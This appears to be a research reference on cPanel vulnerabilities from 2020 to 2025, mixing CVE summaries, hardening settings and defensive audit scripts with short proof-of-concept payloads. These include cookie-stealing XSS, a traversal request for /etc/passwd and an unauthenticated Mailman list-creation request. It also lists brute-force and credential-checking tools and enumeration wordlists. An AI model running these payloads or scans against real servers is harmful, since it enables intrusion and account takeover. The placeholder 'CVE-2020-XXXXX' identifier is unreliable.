cPanel Vulnerabilities, Exploits, and Security Issues (2020-2025)
Executive Summary
This comprehensive research document covers all known vulnerabilities, exploits, misconfigurations, default settings, insecure files, and endpoints discovered in cPanel from 2020 to 2025. cPanel is a widely deployed web hosting control panel with approximately 1.4 million installations exposed on the internet, making it a significant target for attackers.
Table of Contents
- Critical Vulnerabilities (CVEs)
- Common Misconfigurations
- Default Settings & Credentials
- Insecure Files & Directories
- Vulnerable Endpoints
- Exploitation Tools & Resources
- Security Hardening Recommendations
- References & Resources
Critical Vulnerabilities (CVEs)
CVE-2023-29489 - Reflected XSS (March 2023)
Severity: High | CVSS: 7.5
Researcher: Assetnote
Disclosure Date: March 1, 2023
Description
A reflected cross-site scripting (XSS) vulnerability in the /cpanelwebcall/ endpoint that could be exploited without authentication. The vulnerability was exploitable regardless of whether cPanel management ports were exposed externally, affecting websites on ports 80 and 443.
Technical Details
- Vulnerable Component: Cpanel::Server::WebCalls::handle function
- Root Cause: Missing HTML encoding in Cpanel::Server::Handlers::Httpd::ErrorPage.pm
- Affected Ports: 80, 443, 2080, 2082, 2083, 2086, 2087
- Attack Vector: Network
- Authentication Required: None
Proof of Concept
http://example.com/cpanelwebcall/<script>alert(document.cookie)</script>
http://example.com:2082/cpanelwebcall/<img src=x onerror=alert(1)>
https://example.com/cpanelwebcall/<svg/onload=alert(1)>
Impact
- Execute arbitrary JavaScript in victim's browser
- Hijack legitimate user's cPanel session
- Upload web shells and gain command execution
- Affects ~1.4 million cPanel installations
Patched Versions
- 11.109.9999.116
- 11.108.0.13
- 11.106.0.18
- 11.102.0.31
Mitigation
Enable cPanel auto-update functionality or manually upgrade to patched versions.
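As an added example (not code from cPanel or from the original research), the patched-build list above can be applied to an inventory of installed version strings. It assumes the four-part 11.x.y.z form used in that list and that branches newer than the highest listed branch carry the fix; the function names and sample hostnames are hypothetical.

```python
# Added example: classify cPanel versions against the patched builds listed above.
# Fixed build per release branch, copied from the "Patched Versions" list.
PATCHED_BUILDS = {
    (11, 102): (11, 102, 0, 31),
    (11, 106): (11, 106, 0, 18),
    (11, 108): (11, 108, 0, 13),
    (11, 109): (11, 109, 9999, 116),
}


def parse_version(text):
    """Turn '11.108.0.13' into (11, 108, 0, 13); reject anything else."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isascii() and p.isdigit() for p in parts):
        raise ValueError(f"expected four dotted integers, got {text!r}")
    return tuple(int(p) for p in parts)


def cve_2023_29489_status(version_text):
    """Return 'patched', 'vulnerable' or 'no-fix-listed' (hypothetical helper)."""
    version = parse_version(version_text)
    branch = version[:2]
    fixed = PATCHED_BUILDS.get(branch)
    if fixed is not None:
        # Compare integer tuples: as strings, '11.108.0.9' sorts after '11.108.0.13'.
        return "patched" if version >= fixed else "vulnerable"
    if branch > max(PATCHED_BUILDS):
        # Assumption: branches released after the newest fixed branch include the fix.
        return "patched"
    # Older or intermediate branch with no fixed build in the list.
    return "no-fix-listed"


def audit_fleet(inventory):
    """inventory: {hostname: version string}. Returns the hosts that still need an upgrade."""
    needs_upgrade = {}
    for host, version_text in sorted(inventory.items()):
        try:
            status = cve_2023_29489_status(version_text)
        except ValueError:
            status = "unparseable"
        if status != "patched":
            needs_upgrade[host] = (version_text, status)
    return needs_upgrade


if __name__ == "__main__":
    # Constructed inventory; hostnames and versions are sample values.
    sample = {
        "web01.example.com": "11.108.0.9",
        "web02.example.com": "11.108.0.13",
        "web03.example.com": "11.104.0.12",
        "web04.example.com": "11.110.0.5",
        "web05.example.com": "108.0 (build 9)",
    }
    for host, (version, status) in audit_fleet(sample).items():
        print(f"{host}: {version} -> {status}")
```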
References:
- https://www.assetnote.io/resources/research/finding-xss-in-a-million-websites-cpanel-cve-2023-29489
- https://github.com/mdaseem03/cpanel_xss_2023
CVE-2025-43920 - GNU Mailman Command Injection (April 2025)
Severity: Critical | CVSS 3.1: 8.1 (NIST) / 6.9 (MITRE)
Status: Disputed
Published Date: April 19, 2025
Description
GNU Mailman 2.1.39, as bundled in cPanel and WHM, allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line when certain external archiver configurations are enabled.
Technical Details
- Vulnerable Component: GNU Mailman 2.1.39
- Weakness: CWE-78 (OS Command Injection)
- Attack Vector: Network (AV:N)
- Attack Complexity: High (AC:H)
- Privileges Required: None (PR:N)
- User Interaction: None (UI:N)
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Impact
- Execute arbitrary OS commands
- Full system compromise
- Data exfiltration
Notes
Multiple third parties report they are unable to reproduce this vulnerability, regardless of whether cPanel or WHM is used. The vulnerability status is disputed.
References:
- https://nvd.nist.gov/vuln/detail/CVE-2025-43920
- https://github.com/0NYX-MY7H/CVE-2025-43920
CVE-2025-43921 - GNU Mailman Unauthorized List Creation (April 2025)
Severity: High
Published Date: April 19, 2025
Description
GNU Mailman 2.1.39, as bundled in cPanel and WHM, allows unauthenticated attackers to create mailing lists via the /mailman/create endpoint.
Technical Details
- Vulnerable Endpoint: /mailman/create
- Authentication Required: None
- Attack Vector: Network
Proof of Concept
POST /mailman/create HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
listname=malicious&admin=attacker@evil.com&password=password123
Impact
- Create unauthorized mailing lists
- Potential spam distribution
- Resource exhaustion
References:
- https://nvd.nist.gov/vuln/detail/cve-2025-43921
- https://github.com/advisories/GHSA-ch5j-3wwr-pjvh
CVE-2025-43919 - GNU Mailman Directory Traversal (April 2025)
Severity: High
Published Date: April 2025
Description
GNU Mailman 2.1.39, as bundled in cPanel and WHM, allows unauthenticated attackers to read arbitrary files via ../ directory traversal.
Technical Details
- Vulnerability Type: Path Traversal
- Authentication Required: None
- Affected Component: GNU Mailman 2.1.39
Proof of Concept
GET /mailman/../../../../../../etc/passwd HTTP/1.1
Host: target.com
Impact
- Read sensitive system files
- Disclosure of configuration files
- Access to password hashes
References:
- https://access.redhat.com/security/cve/cve-2025-43919
CVE-2023-42115 - Exim Out-of-Bounds RCE (October 2023)
Severity: Critical
Disclosure Date: October 11, 2023
Description
Exim mail server vulnerability allowing out-of-bounds memory access leading to remote code execution. Only affects installations with external authentication enabled.
Technical Details
- Affected Component: Exim mail server
- Prerequisite: External authentication must be enabled
- Default Status: Not vulnerable (external auth disabled by default)
Impact
- Remote code execution
- Full system compromise
Mitigation
cPanel released patches automatically. No action required if external authentication is not enabled.
References:
- https://www.cpanel.net/blog/products/cpanel-vulnerability-report-no-actions-required-by-default/
- https://support.cpanel.net/hc/en-us/community/posts/19164986084887-CVE-2023-42115-Exim-OOB-RCE
CVE-2023-42118 - libspf2 Integer Underflow (October 2023)
Severity: Medium
Disclosure Date: October 11, 2023
Description
A vulnerability related to libspf2 allowing integer underflow. cPanel patched this vulnerability to protect against potential exploitation.
Technical Details
- Affected Component: libspf2 library
- Vulnerability Type: Integer Underflow
- Default Status: Patched automatically
Impact
- Memory corruption
- Potential code execution
References:
- https://www.cpanel.net/blog/products/cpanel-vulnerability-report-no-actions-required-by-default/
CVE-2023-51766 - Exim SMTP Smuggling (January 2024)
Severity: Medium
Disclosure Date: January 24, 2024
Description
Exim Mail Server Simple Mail Transfer Protocol (SMTP) smuggling vulnerability allowing remote attackers to inject email messages with spoofed MAIL FROM addresses, bypassing SPF protection.
Technical Details
- Affected Component: Exim SMTP server
- Attack Vector: SMTP protocol manipulation
- Impact: SPF bypass
Proof of Concept
MAIL FROM:<attacker@evil.com>\r\nMAIL FROM:<spoofed@legitimate.com>
Impact
- Email spoofing
- SPF bypass
- Phishing attacks
References:
- https://support.cpanel.net/hc/en-us/community/posts/20838814238231
CVE-2022-48623 - Cpanel::JSON::XS Out-of-Bounds Access (February 2024)
Severity: Medium
Published Date: February 13, 2024
Description
The Cpanel::JSON::XS package before version 4.33 for Perl performs out-of-bounds accesses allowing attackers to obtain sensitive information.
Technical Details
- Affected Component: Cpanel::JSON::XS Perl module
- Vulnerability Type: Out-of-bounds read
- Affected Versions: < 4.33
Impact
- Information disclosure
- Memory leak
- Potential DoS
Mitigation
Update Cpanel::JSON::XS to version 4.33 or later.
References:
- https://nvd.nist.gov/vuln/detail/CVE-2022-48623
CVE-2020-XXXXX - cPanel Account Bypass (March 2020)
Severity: High
Affected Versions: cPanel before 82.0.18
Description
cPanel before version 82.0.18 allows attackers to leverage virtual mail accounts to bypass account suspensions (SEC-508).
Technical Details
- Vulnerability ID: SEC-508
- Affected Component: Virtual mail account handling
- Fixed Version: 82.0.18
Impact
- Bypass account suspension
- Unauthorized access to suspended accounts
References:
- https://www.prophaze.com/web-application-firewall/cpanel-before-82-0-18-account-bypass-vulnerability/
Common Misconfigurations
1. Weak Password Policies
Risk Level: High
Description
Many cPanel installations use default or weak password strength configurations, allowing users to set easily guessable passwords.
Default Configuration
- Minimum password strength: 0 (no requirement)
- No password complexity enforcement
- No password expiration
Secure Configuration
Navigate to WHM → Security Center → Password Strength Configuration:
- Set minimum password strength to 65+
- Enable password complexity requirements
- Implement password expiration policies
Reference: https://docs.cpanel.net/knowledge-base/security/recommended-security-settings/
2. Anonymous FTP Enabled
Risk Level: High
Description
Anonymous FTP access allows unauthenticated users to access server files, potentially exposing sensitive data.
Default Configuration
- Anonymous FTP: Disabled (but can be enabled)
Secure Configuration
- Ensure Anonymous FTP is disabled in WHM → Service Configuration → FTP Server Configuration
- Use SFTP or FTPS instead
3. Insecure Cookie Attributes
Risk Level: Medium
Description
Cookies without Secure and HttpOnly flags can be intercepted or accessed by client-side scripts.
Vulnerable Configuration
; Missing secure cookie flags
session.cookie_secure = Off
session.cookie_httponly = Off
Secure Configuration
Edit /usr/local/lib/php.ini:
session.cookie_secure = On
session.cookie_httponly = On
session.cookie_samesite = Strict
Apply Apache settings:
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure;SameSite=Strict
Reference: https://support.cpanel.net/hc/en-us/articles/360053782393
4. Disabled Referrer Safety Check
Risk Level: Medium
Description
Disabling referrer safety checks can expose the system to CSRF attacks.
Secure Configuration
WHM → Security Center → Security Policy → Referrer Safety Check: Enable
5. Unrestricted Compiler Access
Risk Level: High
Description
Allowing all users to access system compilers (gcc, g++, etc.) enables attackers to compile malicious binaries.
Secure Configuration
chmod 750 /usr/bin/gcc
chmod 750 /usr/bin/g++
chmod 750 /usr/bin/cc
Or use Compiler Access Manager in WHM.
6. Weak SSL/TLS Configuration
Risk Level: High
Description
Using outdated SSL/TLS protocols and weak ciphers exposes connections to man-in-the-middle attacks.
Vulnerable Configuration
- TLS 1.0/1.1 enabled
- Weak cipher suites (RC4, DES, 3DES)
Secure Configuration
WHM → Service Configuration → Apache Configuration → Global Configuration:
SSLProtocol -all +TLSv1.2 +TLSv1.3
SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256
SSLHonorCipherOrder on
7. Unprotected /tmp Partition
Risk Level: High
Description
An unprotected /tmp partition allows execution of malicious scripts.
Secure Configuration
mount -o remount,noexec,nosuid,nodev /tmp
mount -o remount,noexec,nosuid,nodev /var/tmp
Make permanent in /etc/fstab:
tmpfs /tmp tmpfs defaults,noexec,nosuid,nodev 0 0
tmpfs /var/tmp tmpfs defaults,noexec,nosuid,nodev 0 0
8. SSH Root Login Enabled
Risk Level: Critical
Description
Allowing direct root login via SSH increases the risk of brute-force attacks.
Secure Configuration
Edit /etc/ssh/sshd_config:
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
Restart SSH:
systemctl restart sshd
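The /tmp mount options from item 7 and the sshd_config values from item 8 can be verified from the files themselves. The following is an added example, not part of the original document or of cPanel: it takes the text of sshd_config and /proc/mounts, does not follow Include directives, and assumes upstream OpenSSH defaults for absent keywords. Function names and sample data are hypothetical.

```python
# Added example: audit sshd_config text and /proc/mounts text against the settings above.
SSHD_REQUIRED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "pubkeyauthentication": "yes",
}
# Assumption: upstream OpenSSH defaults, applied when a keyword is absent.
SSHD_DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
}
MOUNT_REQUIRED = {
    "/tmp": {"noexec", "nosuid", "nodev"},
    "/var/tmp": {"noexec", "nosuid", "nodev"},
}


def sshd_effective(config_text):
    """Global-section values; sshd uses the FIRST occurrence of each keyword."""
    values = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        keyword = fields[0].lower()            # keywords are case-insensitive
        if keyword == "match":
            break                              # conditional blocks run to end of file
        if len(fields) > 1:
            values.setdefault(keyword, fields[1].lower())
    return values


def audit_sshd(config_text):
    effective = sshd_effective(config_text)
    findings = []
    for keyword, wanted in SSHD_REQUIRED.items():
        actual = effective.get(keyword, SSHD_DEFAULTS[keyword])
        if actual != wanted:
            findings.append(f"sshd: {keyword} is {actual!r}, expected {wanted!r}")
    return findings


def audit_mounts(mounts_text):
    options = {}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] in MOUNT_REQUIRED:
            # A later entry for the same mount point is stacked on top and wins.
            options[fields[1]] = set(fields[3].split(","))
    findings = []
    for mountpoint, required in MOUNT_REQUIRED.items():
        if mountpoint not in options:
            findings.append(f"mount: {mountpoint} is not a separate mount")
            continue
        missing = sorted(required - options[mountpoint])
        if missing:
            findings.append(f"mount: {mountpoint} lacks {','.join(missing)}")
    return findings


# Constructed samples. The second PasswordAuthentication line is ignored by sshd.
SAMPLE_SSHD = """\
# constructed sample
Port 2222
PermitRootLogin no
PasswordAuthentication yes
passwordauthentication no
Match User backup
    PermitRootLogin yes
"""
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
"""

if __name__ == "__main__":
    for finding in audit_sshd(SAMPLE_SSHD) + audit_mounts(SAMPLE_MOUNTS):
        print(finding)
```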
9. Default SSH Port (22)
Risk Level: Medium
Description
Using the default SSH port makes the server an easy target for automated attacks.
Secure Configuration
Edit /etc/ssh/sshd_config:
# Example value; choose any unused non-standard port (ports below 1024 can only be bound by root)
Port 2222
Update firewall rules and restart SSH.
10. Disabled ModSecurity
Risk Level: High
Description
ModSecurity Web Application Firewall provides protection against common web attacks.
Secure Configuration
WHM → Plugins → ModSecurity:
- Enable ModSecurity
- Enable OWASP Core Rule Set
- Set to "On" or "DetectionOnly" mode
Default Settings & Credentials
Default Access Information
cPanel Access
- URL: http://domain.com:2082 or https://domain.com:2083
- Username: Account-specific (set during creation)
- Password: No default password (set during account creation)
WHM Access
- URL: http://domain.com:2086 or https://domain.com:2087
- Username: root
- Password: Server root password (set during installation)
Webmail Access
- URL: http://domain.com:2095 or https://domain.com:2096
- Username: Email account username
- Password: Email account password
Important Notes
- No default credentials exist for cPanel/WHM
- Passwords are set during installation or account creation
- Root password is the server's root user password
- FTP credentials typically match cPanel credentials
Reference: https://support.cpanel.net/hc/en-us/community/posts/19128187305367
Default Ports
| Port | Service | Protocol |
|---|---|---|
| 20 | FTP Data | TCP |
| 21 | FTP Control | TCP |
| 22 | SSH | TCP |
| 25 | SMTP | TCP |
| 53 | DNS | TCP/UDP |
| 80 | HTTP | TCP |
| 110 | POP3 | TCP |
| 143 | IMAP | TCP |
| 443 | HTTPS | TCP |
| 465 | SMTPS | TCP |
| 587 | SMTP Submission | TCP |
| 993 | IMAPS | TCP |
| 995 | POP3S | TCP |
| 2077 | WHM/WebMail | TCP |
| 2078 | WHM/WebMail SSL | TCP |
| 2082 | cPanel | TCP |
| 2083 | cPanel SSL | TCP |
| 2086 | WHM | TCP |
| 2087 | WHM SSL | TCP |
| 2089 | cPanel License | TCP |
| 2095 | Webmail | TCP |
| 2096 | Webmail SSL | TCP |
| 3306 | MySQL | TCP |
Insecure Files & Directories
Critical Sensitive Files
1. /root/.my.cnf
Risk: Critical
Contains: MySQL root password in plaintext
[client]
password=MySQLRootPassword123
Mitigation:
- Ensure permissions: chmod 600 /root/.my.cnf
- Regularly rotate MySQL root password
2. /var/cpanel/users/*
Risk: High
Contains: User configuration files with password hashes
Example content:
USER=username
DOMAIN=example.com
PASS=hashed_password
EMAIL=user@example.com
Mitigation:
- Restrict access: chmod 600 /var/cpanel/users/*
- Monitor for unauthorized access
3. /etc/trueuserowners
Risk: Medium
Contains: User ownership mapping
Note: In cPanel v132+, permissions have been tightened to prevent world-readable access.
Mitigation:
- Update to cPanel v132 or later
- Verify permissions: chmod 640 /etc/trueuserowners
4. /var/cpanel/cpanel.config
Risk: High
Contains: Primary cPanel configuration with sensitive settings
Mitigation:
- Restrict access: chmod 600 /var/cpanel/cpanel.config
- Regular security audits
5. /var/cpanel/accounting.log
Risk: Medium
Contains: Account creation and deletion logs
Mitigation:
- Monitor for suspicious activity
- Implement log rotation
6. /usr/local/cpanel/logs/access_log
Risk: Medium
Contains: cPanel access logs with session tokens
Mitigation:
- Restrict access: chmod 640 /usr/local/cpanel/logs/*
- Implement log monitoring
7. /home/username/.my.cnf
Risk: High
Contains: User-specific MySQL credentials
Mitigation:
- Ensure proper permissions
- Educate users on secure credential storage
8. /etc/wwwacct.conf
Risk: Medium
Contains: Account creation defaults
Mitigation:
- Review and harden default settings
- Restrict access
Backup Files
9. /backup/ or /home/backup/
Risk: High
Contains: Full account backups with all data
Mitigation:
- Encrypt backups
- Restrict access to backup directory
- Implement secure backup rotation
10. Database Dumps
Risk: Critical
Locations:
- /home/username/mysql-backups/
- /backup/mysql/
Mitigation:
- Encrypt database dumps
- Secure storage locations
- Regular cleanup of old dumps
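The chmod values given for the files above can be checked in one pass. This is an added example, not part of the original document or of cPanel's tooling: it reports regular files whose mode carries bits beyond the recommended value, and takes a root argument (a hypothetical parameter) so it can be pointed at a mounted image or a test tree.

```python
# Added example: compare file modes with the chmod values recommended above.
import glob
import os
import stat

# (path or glob, most permissive acceptable mode), taken from the mitigations above.
RECOMMENDED_MODES = [
    ("/root/.my.cnf", 0o600),
    ("/var/cpanel/users/*", 0o600),
    ("/etc/trueuserowners", 0o640),
    ("/var/cpanel/cpanel.config", 0o600),
    ("/usr/local/cpanel/logs/*", 0o640),
]

BIT_NAMES = [
    (stat.S_IRGRP, "group-read"), (stat.S_IWGRP, "group-write"),
    (stat.S_IXGRP, "group-exec"), (stat.S_IROTH, "world-read"),
    (stat.S_IWOTH, "world-write"), (stat.S_IXOTH, "world-exec"),
    (stat.S_IXUSR, "owner-exec"), (stat.S_ISUID, "setuid"),
    (stat.S_ISGID, "setgid"),
]


def describe_excess(bits):
    """Name the permission bits that go beyond the recommended mode."""
    return [label for bit, label in BIT_NAMES if bits & bit]


def audit_modes(root="/"):
    """Return (path, actual mode, excess bits) for every file that is too permissive."""
    findings = []
    for pattern, max_mode in RECOMMENDED_MODES:
        full_pattern = os.path.join(glob.escape(root), pattern.lstrip("/"))
        for path in sorted(glob.glob(full_pattern)):
            info = os.lstat(path)              # lstat: do not follow symlinks
            if not stat.S_ISREG(info.st_mode):
                continue                       # only regular files are in scope
            mode = stat.S_IMODE(info.st_mode)
            excess = mode & ~max_mode
            if excess:
                findings.append((path, oct(mode), describe_excess(excess)))
    return findings


if __name__ == "__main__":
    for path, mode, excess in audit_modes("/"):
        print(f"{path}: mode {mode} grants {', '.join(excess)}")
```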
Vulnerable Endpoints
Pre-Authentication Endpoints
1. /cpanelwebcall/
Vulnerability: CVE-2023-29489 (XSS)
Risk: High
Authentication: None required
Description: Reflected XSS vulnerability allowing arbitrary JavaScript execution.
Test:
curl "http://target.com/cpanelwebcall/<script>alert(1)</script>"
2. /mailman/create
Vulnerability: CVE-2025-43921
Risk: High
Authentication: None required
Description: Allows unauthenticated list creation.
Test:
curl -X POST http://target.com/mailman/create \
-d "listname=test&admin=test@test.com&password=pass123"
3. /cgi-sys/defaultwebpage.cgi
Risk: Low
Authentication: None required
Description: Default webpage handler, may leak information about cPanel version.
4. /cgi-sys/suspendedpage.cgi
Risk: Low
Authentication: None required
Description: Suspended account page, confirms cPanel usage.
5. /.well-known/cpanel-dcv/
Risk: Low
Authentication: None required
Description: Domain control validation endpoint.
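For monitoring, requests that match the pre-authentication issues described in this document (CVE-2023-29489, CVE-2025-43921 and CVE-2025-43919) can be flagged in web server access logs. The following is an added example, not part of the original document: it assumes Apache combined log format, the log lines are constructed samples, and the function names are hypothetical.

```python
# Added example: flag access-log requests matching the pre-authentication issues above.
import re
from collections import Counter
from urllib.parse import unquote

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
HTML_META = re.compile(r"[<>\"']")
WEBCALL_PREFIX = "/cpanelwebcall/"


def fully_decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is also seen."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(method, target):
    """Return the CVE id a request matches, or None."""
    path = fully_decode(target.split("?", 1)[0])
    lower = path.lower()
    if lower.startswith(WEBCALL_PREFIX) and HTML_META.search(path[len(WEBCALL_PREFIX):]):
        return "CVE-2023-29489"      # markup characters reflected by the error page
    if lower.startswith("/mailman/") and "../" in path:
        return "CVE-2025-43919"      # directory traversal under /mailman/
    if method == "POST" and lower.rstrip("/") == "/mailman/create":
        return "CVE-2025-43921"      # list creation request; review who sent it
    return None


def scan(lines):
    findings = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        cve = classify(match["method"], match["target"])
        if cve:
            findings.append({"ip": match["ip"], "cve": cve,
                             "status": int(match["status"]), "target": match["target"]})
    return findings


def by_source(findings):
    """Number of flagged requests per client address."""
    return dict(Counter(f["ip"] for f in findings))


# Constructed log lines (documentation address ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2023:10:00:01 +0000] "GET /cpanelwebcall/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 400 512 "-" "curl/8.0"',
    '203.0.113.7 - - [01/May/2023:10:00:05 +0000] "GET /cpanelwebcall/%253Csvg%252Fonload%253Dalert(1)%253E HTTP/1.1" 400 498 "-" "curl/8.0"',
    '198.51.100.23 - - [20/Apr/2025:08:12:40 +0000] "GET /mailman/..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 230 "-" "-"',
    '198.51.100.23 - - [20/Apr/2025:08:12:44 +0000] "POST /mailman/create HTTP/1.1" 200 1840 "-" "-"',
    '192.0.2.10 - - [20/Apr/2025:09:00:00 +0000] "GET /cpanelwebcall/abcDEF0123456789 HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Apr/2025:09:00:02 +0000] "GET /mailman/listinfo/news_example.com HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for finding in results:
        print(f'{finding["ip"]} {finding["cve"]} status={finding["status"]} {finding["target"]}')
    print(by_source(results))
```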
Authenticated Endpoints
6. /json-api/
Risk: Medium
Authentication: Required
Description: JSON API endpoint for cPanel operations.
Common Functions:
- /json-api/cpanel
- /json-api/whm
7. /xml-api/
Risk: Medium
Authentication: Required
Description: Legacy XML API endpoint.
8. /cpsess{sessionid}/
Risk: High
Authentication: Session-based
Description: Session-based access to cPanel functions.
Session Hijacking Risk: High if XSS vulnerabilities exist.
Information Disclosure Endpoints
9. /bandwidth/
Risk: Low
Authentication: May vary
Description: Bandwidth usage statistics.
10. /.cpanel/
Risk: Low
Authentication: None required
Description: cPanel-specific resources.
Exploitation Tools & Resources
GitHub Repositories
1. Breacher - Admin Panel Finder
- Repository: https://github.com/s0md3v/Breacher
- Language: Python
- Stars: 825+
- Description: Advanced multithreaded admin panel finder
Installation:
git clone https://github.com/s0md3v/Breacher
cd Breacher
pip3 install -r requirements.txt
python3 breacher.py -u https://target.com
2. cpanel_xss_2023
- Repository: https://github.com/mdaseem03/cpanel_xss_2023
- Language: Python
- Description: CVE-2023-29489 vulnerability scanner
Usage:
git clone https://github.com/mdaseem03/cpanel_xss_2023
cd cpanel_xss_2023
python3 cpanel_xss.py -u https://target.com
3. cpanel-whm-ssh-ftp-exploit
- Repository: https://github.com/UND3F3IND/cpanel-whm-ssh-ftp-exploit
- Language: Python
- Description: Multi-vulnerability exploitation tool
Features:
- Multiprocessing support
- Multiple exploit modules
- Automated exploitation
4. cpanel-checker
- Repository: https://github.com/TrixSec/cpanel-checker
- Language: Python
- Description: Multi-threaded cPanel credential checker
Usage:
python3 cpanel_checker.py -l credentials.txt -t 50
5. CSI (cPanel Security Investigator)
- Repository: https://github.com/CpanelInc/tech-CSI
- Language: Shell/Perl
- Description: Official cPanel security investigation tool
Installation:
wget https://raw.githubusercontent.com/CpanelInc/tech-CSI/master/csi.pl
chmod +x csi.pl
./csi.pl
6. AdminHack
- Repository: https://github.com/mishakorzik/AdminHack
- Language: Shell
- Stars: 822+
- Description: Admin panel exploitation tool
Wordlists
cPanel Directory Wordlist
/cpanel
/whm
/webmail
/cpanelwebcall/
/cgi-sys/
/.cpanel/
/.well-known/
/img-sys/
/sys_cpanel/
/json-api/
/xml-api/
/frontend/
/unprotected/
/bandwidth/
/mailman/
/horde/
/roundcube/
/squirrelmail/
/autodiscover/
/autoconfig/
Download: https://gist.github.com/DaveYesland/e1d42489334049daf59d1c26543faa8b
cPanel Subdomain Wordlist
cpanel
whm
webmail
mail
webdisk
autodiscover
autoconfig
cpcalendars
cpcontacts
ftp
smtp
pop
imap
ns1
ns2
Penetration Testing Tools
Nuclei Templates
nuclei -u https://target.com -t cpanel/ -severity high,critical
Nmap Scripts
nmap -p 2082,2083,2086,2087 --script=http-cpanel-brute target.com
Metasploit Modules
use auxiliary/scanner/http/cpanel_login
set RHOSTS target.com
set RPORT 2083
run
Security Hardening Recommendations
1. Enable Two-Factor Authentication
WHM → Security Center → Two-Factor Authentication
Configure 2FA for all WHM and cPanel accounts.
2. Install and Configure ConfigServer Firewall (CSF)
Note: ConfigServer has reached EOL. Consider alternatives like Imunify360 or fail2ban.
cd /usr/src
wget https://download.configserver.com/csf.tgz
tar -xzf csf.tgz
cd csf
sh install.sh
Configure /etc/csf/csf.conf:
TESTING = "0"
TCP_IN = "22,25,53,80,110,143,443,465,587,993,995,2077,2078,2082,2083,2086,2087,2089,2095,2096"
TCP_OUT = "20,21,22,25,53,80,110,113,443,587,993,995"
3. Enable ModSecurity with OWASP Rules
WHM → Plugins → ModSecurity
Install OWASP Core Rule Set:
cd /etc/apache2/conf.d
wget https://github.com/coreruleset/coreruleset/archive/v3.3.4.tar.gz
tar -xzf v3.3.4.tar.gz
4. Implement Rate Limiting
Edit /etc/apache2/conf.d/ratelimit.conf:
<IfModule mod_ratelimit.c>
    <Location />
        SetOutputFilter RATE_LIMIT
        SetEnv rate-limit 400
    </Location>
</IfModule>
5. Regular Security Audits
Use WHM → Security Center → Security Advisor to identify and fix security issues.
/usr/local/cpanel/scripts/check_security
6. Disable Unnecessary Services
systemctl disable telnet
systemctl disable rsh
systemctl disable rlogin
7. Implement Intrusion Detection
Install AIDE (Advanced Intrusion Detection Environment):
yum install aide
aide --init
mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz
aide --check
8. Enable Audit Logging
Configure auditd:
yum install audit
systemctl enable auditd
systemctl start auditd
Add rules to /etc/audit/rules.d/cpanel.rules:
-w /var/cpanel/ -p wa -k cpanel_config_changes
-w /root/.my.cnf -p wa -k mysql_root_access
-w /etc/passwd -p wa -k user_modification
9. Implement Backup Strategy
WHM → Backup → Backup Configuration
- Enable daily backups
- Store backups off-site
- Encrypt backup files
- Test restoration regularly
10. Keep cPanel Updated
Enable automatic updates: WHM → Server Configuration → Update Preferences
/scripts/upcp --force
References & Resources
Official Documentation
- cPanel Documentation: https://docs.cpanel.net/
- cPanel Security Best Practices: https://docs.cpanel.net/knowledge-base/security/security-best-practices/
- cPanel Release Notes: https://docs.cpanel.net/release-notes/release-notes/
Security Advisories
- cPanel Security Advisories: https://www.cpanel.net/blog/category/security/
- NVD cPanel Vulnerabilities: https://nvd.nist.gov/vuln/search/results?query=cpanel
Research Papers
- Assetnote cPanel XSS Research: https://www.assetnote.io/resources/research/finding-xss-in-a-million-websites-cpanel-cve-2023-29489
Tools & Scripts
- cPanel GitHub Organization: https://github.com/CPANELINC
- cPanel Topics on GitHub: https://github.com/topics/cpanel
Community Resources
- cPanel Forums: https://forums.cpanel.net/
- cPanel Support: https://support.cpanel.net/
Security Tools
- Imunify360: https://www.imunify360.com/
- ConfigServer Products: https://configserver.com/
- ModSecurity: https://modsecurity.org/
Wordlists & Enumeration
- SecLists: https://github.com/danielmiessler/SecLists
- Common cPanel Paths: https://gist.github.com/irazasyed/6488963
Conclusion
cPanel remains a widely deployed web hosting control panel with a significant attack surface. While the platform has improved its security posture over the years, misconfigurations and vulnerabilities continue to pose risks. System administrators must:
- Keep cPanel updated to the latest version
- Implement strong authentication including 2FA
- Harden default configurations according to security best practices
- Monitor for suspicious activity using logging and intrusion detection
- Run regular security audits to identify and remediate vulnerabilities
- Educate users on security best practices
By following the recommendations in this document, organizations can significantly reduce their exposure to cPanel-related security risks.
Document Version: 1.0
Last Updated: October 31, 2025
Author: Security Research Team
Classification: Public
Additional Resources
Wordlists for cPanel Enumeration
Directory Enumeration Wordlist
/cpanel
/whm
/webmail
/cpanelwebcall/
/cgi-sys/
/.cpanel/
/.well-known/
/.well-known/acme-challenge/
/.well-known/cpanel-dcv/
/.well-known/pki-validation/
/img-sys/
/sys_cpanel/
/json-api/
/xml-api/
/frontend/
/unprotected/
/bandwidth/
/mailman/
/mailman/create
/mailman/admin
